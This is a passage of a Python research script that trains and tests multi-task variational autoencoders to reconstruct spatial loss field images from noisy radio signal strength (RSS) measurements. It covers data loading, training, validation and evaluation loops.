def load_testing_img1(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data for image 1
testing_data1 = sio.loadmat('./data/testing_data_image1.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS1 = testing_data1['RSS']
test_input_RSS1 = (test_input_RSS1 - RSS_min) / (RSS_max - RSS_min)
test_input_RSS1 = test_input_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS1 = testing_data1['RSS_denoise']
test_denoise_RSS1 = (test_denoise_RSS1 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS1 = test_denoise_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img1 = testing_data1['slf_img']
test_slf_img1 = test_slf_img1.reshape(1, self.args.K0 * self.args.K1)
# SLF image (shape: [num_sample, K[0]*K[1]])
test_slf_img1 = np.tile(test_slf_img1, (test_input_RSS1.shape[0], 1))
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab1 = testing_data1['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_level1 = testing_data1['sig_epsilon_class']
test_noise_level1 = np.squeeze(test_noise_level1)
if noise_level == 'all':
pass
elif noise_level == 'low':
test_input_RSS1 = test_input_RSS1[:500]
test_denoise_RSS1 = test_denoise_RSS1[:500]
test_slf_img1 = test_slf_img1[:500]
test_ab1 = test_ab1[:500]
test_noise_level1 = test_noise_level1[:500]
elif noise_level == 'mid':
test_input_RSS1 = test_input_RSS1[500:1000]
test_denoise_RSS1 = test_denoise_RSS1[500:1000]
test_slf_img1 = test_slf_img1[500:1000]
test_ab1 = test_ab1[500:1000]
test_noise_level1 = test_noise_level1[500:1000]
elif noise_level == 'high':
test_input_RSS1 = test_input_RSS1[1000:]
test_denoise_RSS1 = test_denoise_RSS1[1000:]
test_slf_img1 = test_slf_img1[1000:]
test_ab1 = test_ab1[1000:]
test_noise_level1 = test_noise_level1[1000:]
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_input_RSS1 = torch.from_numpy(test_input_RSS1).float()
test_denoise_RSS1 = torch.from_numpy(test_denoise_RSS1).float()
test_slf_img1 = torch.from_numpy(test_slf_img1).float()
test_ab1 = torch.from_numpy(test_ab1).float()
test_noise_level1 = torch.from_numpy(test_noise_level1).long()
Test_Dataset_1 = TensorDataset(test_input_RSS1, test_denoise_RSS1, test_slf_img1, test_ab1, test_noise_level1)
return Test_Dataset_1
def load_testing_img2(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data for image 2
testing_data2 = sio.loadmat('./data/testing_data_image2.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS2 = testing_data2['RSS']
test_input_RSS2 = (test_input_RSS2 - RSS_min) / (RSS_max - RSS_min)
test_input_RSS2 = test_input_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS2 = testing_data2['RSS_denoise_norm']
test_denoise_RSS2 = (test_denoise_RSS2 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS2 = test_denoise_RSS2.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img2 = testing_data2['slf_img']
test_slf_img2 = test_slf_img2.reshape(1, self.args.K0 * self.args.K1)
# SLF image (shape: [num_sample, K[0]*K[1]])
test_slf_img2 = np.tile(test_slf_img2, (test_input_RSS2.shape[0], 1))
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab2 = testing_data2['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_level2 = testing_data2['sig_epsilon_class']
test_noise_level2 = np.squeeze(test_noise_level2)
if noise_level == 'all':
pass
elif noise_level == 'low':
test_input_RSS2 = test_input_RSS2[:500]
test_denoise_RSS2 = test_denoise_RSS2[:500]
test_slf_img2 = test_slf_img2[:500]
test_ab2 = test_ab2[:500]
test_noise_level2 = test_noise_level2[:500]
elif noise_level == 'mid':
test_input_RSS2 = test_input_RSS2[500:1000]
test_denoise_RSS2 = test_denoise_RSS2[500:1000]
test_slf_img2 = test_slf_img2[500:1000]
test_ab2 = test_ab2[500:1000]
test_noise_level2 = test_noise_level2[500:1000]
elif noise_level == 'high':
test_input_RSS2 = test_input_RSS2[1000:]
test_denoise_RSS2 = test_denoise_RSS2[1000:]
test_slf_img2 = test_slf_img2[1000:]
test_ab2 = test_ab2[1000:]
test_noise_level2 = test_noise_level2[1000:]
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_input_RSS2 = torch.from_numpy(test_input_RSS2).float()
test_denoise_RSS2 = torch.from_numpy(test_denoise_RSS2).float()
test_slf_img2 = torch.from_numpy(test_slf_img2).float()
test_ab2 = torch.from_numpy(test_ab2).float()
test_noise_level2 = torch.from_numpy(test_noise_level2).long()
Test_Dataset_2 = TensorDataset(test_input_RSS2, test_denoise_RSS2, test_slf_img2, test_ab2, test_noise_level2)
return Test_Dataset_2
def train(self, model, train_loader, optimizer, epoch):
model.train()
train_loss = 0 # total loss
train_kld = 0 # kl-divergence
train_loss_task0 = 0 # loss for reconstruct RSS
train_loss_task1 = 0 # loss for SLF image estimation
train_loss_task2 = 0 # loss for parameters estimation
train_loss_task3 = 0 # loss for noise level prediction
train_acc = 0 # accuracy for noise level prediction
batch_num = int(len(train_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(train_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
optimizer.zero_grad()
KLD, RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
train_loss += loss.item()
train_kld += KLD.item()
train_loss_task0 += loss_task0.item()
train_loss_task1 += loss_task1.item()
train_loss_task2 += loss_task2.item()
train_loss_task3 += loss_task3.item()
_, noise_pred = torch.max(noise_level, 1)
acc_task3 = (noise_pred == target_noise_level).sum()
train_acc += acc_task3.item()
loss /= input_RSS.size(0)
loss.backward()
optimizer.step()
if batch_idx % self.args.log_interval == 0:
print(
'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tKLD: {:.6f}\tLoss0: {:.6f}\tLoss1: {:.6f}\tLoss2: {:.6f}\tLoss3: {:.6f}\tAcc: {:.6f}'.format(
epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
100. * batch_idx / len(train_loader),
loss.item(),
KLD.item() / len(input_RSS),
loss_task0.item() / len(input_RSS), loss_task1.item() / len(input_RSS),
loss_task2.item() / len(input_RSS), loss_task3.item() / len(input_RSS),
acc_task3.item() / len(input_RSS)))
train_loss /= len(train_loader.dataset)
train_kld /= len(train_loader.dataset)
train_loss_task0 /= len(train_loader.dataset)
train_loss_task1 /= len(train_loader.dataset)
train_loss_task2 /= len(train_loader.dataset)
train_loss_task3 /= len(train_loader.dataset)
train_acc /= len(train_loader.dataset)
print('====> Epoch: {} Average loss: {:.6f}'.format(epoch, train_loss))
print('====> KL divergence: {:.6f}'.format(train_kld))
print('====> RSS loss: {:.6f}'.format(train_loss_task0))
print('====> SLF loss: {:.6f}'.format(train_loss_task1))
print('====> ab loss: {:.6f}'.format(train_loss_task2))
print('====> noise level loss: {:.6f}'.format(train_loss_task3))
print('====> noise level Accuracy: {:.4f}'.format(train_acc))
return train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc
def validate(self, model, val_loader, epoch):
model.eval()
val_loss = 0 # total loss
val_rmse_slf = 0 # slf reconstruction loss
val_mae_slf = 0 # slf reconstruction loss
batch_num = int(len(val_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(val_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = 0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
val_loss += loss.item()
slf_mse = F.mse_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
slf_mae = F.l1_loss(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
val_rmse_slf += slf_mse.item()
val_mae_slf += slf_mae.item()
val_loss /= len(val_loader.dataset)
val_rmse_slf /= len(val_loader.dataset)
val_rmse_slf = np.sqrt(val_rmse_slf)
val_mae_slf /= len(val_loader.dataset)
print('====> Validation set loss: {:.6f}'.format(val_loss))
print('====> Validation set SLF rmse: {:.6f}'.format(val_rmse_slf))
print('====> Validation set SLF mae: {:.6f}'.format(val_mae_slf))
return val_loss, val_rmse_slf, val_mae_slf
def test(self, model, test_loader, epoch):
model.eval()
test_loss = 0 # total loss
test_kld = 0 # KL-divergence
test_loss_task0 = 0 # loss for reconstruct RSS
test_loss_task1 = 0 # loss for SLF image estimation
test_loss_task2 = 0 # loss for parameters estimation
test_loss_task3 = 0 # loss for noise level prediction
batch_num = int(len(test_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
with torch.no_grad():
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_level = model(input_RSS)
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
test_loss += loss.item()
test_kld += KLD.item()
test_loss_task0 += loss_task0.item()
test_loss_task1 += loss_task1.item()
test_loss_task2 += loss_task2.item()
test_loss_task3 += loss_task3.item()
test_loss /= len(test_loader.dataset)
test_kld /= len(test_loader.dataset)
test_loss_task0 /= len(test_loader.dataset)
test_loss_task1 /= len(test_loader.dataset)
test_loss_task2 /= len(test_loader.dataset)
test_loss_task3 /= len(test_loader.dataset)
test_acc = self.test_accuracy(model, test_loader)
print('====> Test set loss: {:.6f}'.format(test_loss))
print('====> Test set KL divergence: {:.6f}'.format(test_kld))
print('====> Test set RSS loss: {:.6f}'.format(test_loss_task0))
print('====> Test set SLF loss: {:.6f}'.format(test_loss_task1))
print('====> Test set ab loss: {:.6f}'.format(test_loss_task2))
print('====> Test set noise level loss: {:.6f}'.format(test_loss_task3))
print('====> Test set noise level Accuracy: {:.4f}'.format(test_acc))
return test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc
def train_save(self):
model = MLVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
def weights_init(m):
if isinstance(m, torch.nn.Linear) or isinstance(m, torch.nn.Conv2d) or isinstance(m,
torch.nn.ConvTranspose2d):
torch.nn.init.xavier_uniform_(m.weight.data)
if m.bias is not None:
torch.nn.init.zeros_(m.bias.data)
model.apply(weights_init)
model = model.to(self.device)
summary(model, input_size=(self.args.batch_size, self.args.N, self.args.P, self.args.P))
train_loader, val_loader, test_loader, test_loader1, test_loader2 = self.load_data()
optimizer = self.get_optimizer(model.parameters())
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', factor=0.25, patience=10, min_lr=1e-5)
train_set = []
val_set = []
test_set = [] # for test set
test_set1 = [] # for test image 1
test_set2 = [] # for test image 2
train_loss_path = self.path + 'train_loss_' + str(self.args.n_epochs) + '.npy'
val_loss_path = self.path + 'val_loss_' + str(self.args.n_epochs) + '.npy'
test_loss_path = self.path + 'test_loss_' + str(self.args.n_epochs) + '.npz'
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
current_val_slf_loss = np.inf
for epoch in range(1, self.args.n_epochs + 1):
print("Epoch %d learning rate:%f" % (epoch, optimizer.param_groups[0]['lr']))
train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc = self.train(
model,
train_loader,
optimizer,
epoch)
train_set.append(
[train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3,
train_acc])
print('====> Validation Loss for Epoch {:d}'.format(epoch))
val_loss, val_slf_rmse, val_slf_mae = self.validate(model, val_loader, epoch)
val_set.append([val_loss, val_slf_rmse, val_slf_mae])
scheduler.step(val_loss)
print('====> Test for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(
model,
test_loader, epoch)
test_set.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
print('====> Test Image1 for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(
model,
test_loader1, epoch)
test_set1.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
print('====> Test Image2 for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(
model,
test_loader2, epoch)
test_set2.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
if epoch % self.args.save_freq == 0:
ckpt_path = self.path + '/model' + '_' + str(epoch) + '.pth'
torch.save(model.state_dict(), ckpt_path)
print('checkpoint{}.pth saved!'.format(epoch))
if val_slf_mae < current_val_slf_loss:
torch.save(model.state_dict(), model_path)
current_val_slf_loss = val_slf_mae
train_loss = np.asarray(train_set).reshape(-1, 7)
val_loss = np.asarray(val_set).reshape(-1, 3)
test_loss = np.asarray(test_set).reshape(-1, 7)
test_loss1 = np.asarray(test_set1).reshape(-1, 7)
test_loss2 = np.asarray(test_set2).reshape(-1, 7)
np.save(train_loss_path, train_loss)
np.save(val_loss_path, val_loss)
np.savez(test_loss_path, test_loss=test_loss, test_loss1=test_loss1, test_loss2=test_loss2)
def test_accuracy(self, model, test_loader):
model.eval()
acc = 0
for i, (input_RSS, *_, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
*_, noise_pred = model(input_RSS) # noise_pred: [batch_size, 3]
noise_pred = noise_pred.detach().cpu().numpy()
noise_pred = np.argmax(noise_pred, axis=1)
labels = target_noise_level.detach().cpu().numpy()
acc += np.sum((noise_pred == labels).astype(int))
acc /= len(test_loader.dataset)
return acc
def test_model(self, noise_level='all'):
model = MLVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
model = model.to(self.device)
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
model.load_state_dict(torch.load(model_path, map_location=self.device))
model.eval()
*_, test_loader, test_loader1, test_loader2 = self.load_data(noise_level)
noise_class = 0 # noise_class = 0 stands for all noise classes
if noise_level == 'low':
noise_class = 1
elif noise_level == 'mid':
noise_class = 2
elif noise_level == 'high':
noise_class = 3
# test model for testing set
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(
test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader.dataset)
ab_rmse /= len(test_loader.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader)
print('====> Test for Testing Set:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# test model for image 1
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader1):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF1_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader1.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader1.dataset)
ab_rmse /= len(test_loader1.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader1)
print('====> Test for image 1:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# test model for image 2
slf_rmse = 0
slf_mae = 0
ab_rmse = 0
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader2):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_pred = model(input_RSS)
# plot SLF reconstruction image for image1
n = min(target_RSS.size(0), 8)
comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
save_image(comparison.cpu(),
self.path + 'reconstruction_SLF2_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
nrow=n)
# test SLF image RMSE
slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test SLF image MAE
slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
# test ab parameters RMSE
ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
slf_rmse /= len(test_loader2.dataset)
slf_rmse = np.sqrt(slf_rmse)
slf_mae /= len(test_loader2.dataset)
ab_rmse /= len(test_loader2.dataset)
ab_rmse = np.sqrt(ab_rmse)
noise_acc = self.test_accuracy(model, test_loader2)
print('====> Test for image 2:')
print('====> Noise_level: ' + noise_level)
print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# runner for Multi-task Gaussian Mixture VAE
class MGMVAE_runner():
def __init__(self, args):
self.args = args
cuda_flag = not self.args.no_cuda and torch.cuda.is_available()
self.device = torch.device("cuda" if cuda_flag else "cpu")
torch.manual_seed(self.args.seed)
random.seed(self.args.seed)
self.path = self.args.run + 'MGMVAE/'
if not os.path.exists(self.path):
os.makedirs(self.path)
def get_optimizer(self, parameters):
if self.args.optimizer == 'Adam':
return optim.Adam(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay, betas=(0.9, 0.999), eps=1e-7)
elif self.args.optimizer == 'RMSProp':
return optim.RMSprop(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay)
elif self.args.optimizer == 'SGD':
return optim.SGD(parameters, lr=self.args.lr, momentum=0.9)
else:
raise NotImplementedError('Optimizer {} not understood.'.format(self.args.optimizer))
def load_data(self, noise_level='all'):
dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min = self.load_training_data()
train_size = int(len(dataset) * 0.9)
val_size = int(len(dataset) * 0.1)
dataset_train, dataset_val = random_split(dataset, [train_size, val_size],
generator=torch.Generator().manual_seed(self.args.seed))
dataset_test = self.load_testing_data(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test1 = self.load_testing_img1(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test2 = self.load_testing_img2(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
train_loader = DataLoader(
dataset_train,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
val_loader = DataLoader(
dataset_val,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
test_loader = DataLoader(
dataset_test,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader1 = DataLoader(
dataset_test1,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader2 = DataLoader(
dataset_test2,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
print("Data Loaded!")
return train_loader, val_loader, test_loader, test_loader1, test_loader2
def load_training_data(self):
# Load training data
training_data = sio.loadmat('./data/training_data.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
train_input_RSS = training_data['RSS']
RSS_max = np.amax(train_input_RSS, axis=0, keepdims=True)
RSS_min = np.amin(train_input_RSS, axis=0, keepdims=True)
train_input_RSS = (train_input_RSS - RSS_min) / (RSS_max - RSS_min)
train_input_RSS = train_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
train_denoise_RSS = training_data['RSS_denoise']
RSS_denoise_max = np.amax(train_denoise_RSS, axis=0, keepdims=True)
RSS_denoise_min = np.amin(train_denoise_RSS, axis=0, keepdims=True)
train_denoise_RSS = (train_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
train_denoise_RSS = train_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [num_sample, K[0]*K[1]])
train_slf_img = training_data['slf_img']
train_slf_img = train_slf_img.reshape(-1, self.args.K0 * self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
train_ab = training_data['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
train_noise_level = training_data['sig_epsilon_class']
train_noise_level = np.squeeze(train_noise_level)
train_input_RSS = torch.from_numpy(train_input_RSS).float()
train_denoise_RSS = torch.from_numpy(train_denoise_RSS).float()
train_slf_img = torch.from_numpy(train_slf_img).float()
train_ab = torch.from_numpy(train_ab).float()
train_noise_level = torch.from_numpy(train_noise_level).long()
Train_Dataset = TensorDataset(train_input_RSS, train_denoise_RSS, train_slf_img, train_ab, train_noise_level)
return Train_Dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min
def load_testing_data(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data
testing_data = sio.loadmat('./data/testing_data.mat')
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_class = testing_data['sig_epsilon_class']
test_noise_class = np.squeeze(test_noise_class)
idx = (test_noise_class == 0) | (test_noise_class == 1) | (test_noise_class == 2)
if noise_level == 'all':
pass
elif noise_level == 'low':
idx = (test_noise_class == 0)
elif noise_level == 'mid':
idx = (test_noise_class == 1)
elif noise_level == 'high':
idx = (test_noise_class == 2)
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_noise_class = test_noise_class[idx]
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS = testing_data['RSS'][idx]
test_input_RSS = (test_input_RSS - RSS_min) / (RSS_max - RSS_min)
test_input_RSS = test_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS = testing_data['RSS_denoise'][idx]
test_denoise_RSS = (test_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS = test_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img = testing_data['slf_img'][idx]
test_slf_img = test_slf_img.reshape(-1, self.args.K0 * self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab = testing_data['ab_norm'][idx]
test_input_RSS = torch.from_numpy(test_input_RSS).float()
test_denoise_RSS = torch.from_numpy(test_denoise_RSS).float()
test_slf_img = torch.from_numpy(test_slf_img).float()
test_ab = torch.from_numpy(test_ab).float()
test_noise_class = torch.from_numpy(test_noise_class).long()
Test_Dataset = TensorDataset(test_input_RSS, test_denoise_RSS, test_slf_img, test_ab, test_noise_class)
return Test_Dataset
def load_testing_img1(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data for image 1
testing_data1 = sio.loadmat('./data/testing_data_image1.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS1 = testing_data1['RSS']
test_input_RSS1 = (test_input_RSS1 - RSS_min) / (RSS_max - RSS_min)
test_input_RSS1 = test_input_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS1 = testing_data1['RSS_denoise']
test_denoise_RSS1 = (test_denoise_RSS1 - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
test_denoise_RSS1 = test_denoise_RSS1.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [1, K[0]*K[1]])
test_slf_img1 = testing_data1['slf_img']
test_slf_img1 = test_slf_img1.reshape(1, self.args.K0 * self.args.K1)
# SLF image (shape: [num_sample, K[0]*K[1]])
test_slf_img1 = np.tile(test_slf_img1, (test_input_RSS1.shape[0], 1))
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
test_ab1 = testing_data1['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_level1 = testing_data1['sig_epsilon_class']
